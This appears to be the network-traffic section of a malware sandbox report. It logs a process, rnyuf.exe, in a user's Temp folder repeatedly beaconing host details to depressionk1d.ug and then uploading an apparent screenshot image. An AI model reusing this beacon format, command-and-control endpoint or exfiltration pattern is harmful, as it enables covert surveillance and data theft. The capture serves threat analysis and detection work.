                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:05.488791943 CET10341INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:05 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:05.488873005 CET10342INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          237192.168.2.450046178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:05.636332989 CET10343OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:05.658807039 CET10345INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:05 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:05.658819914 CET10345INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          238192.168.2.450048178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:05.809629917 CET10346OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:05.833409071 CET10348INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:05 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:05.833414078 CET10348INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          239192.168.2.450049178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:05.844512939 CET10349OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:05.844644070 CET10349OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:05.844856977 CET10359OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:05.844961882 CET10362OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:05.867327929 CET10365OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:05.867364883 CET10371OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:05.867376089 CET10373OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:05.867423058 CET10381OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:05.867435932 CET10383OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:05.867482901 CET10385OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:05.867538929 CET10388OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:05.939395905 CET10459INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:05 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
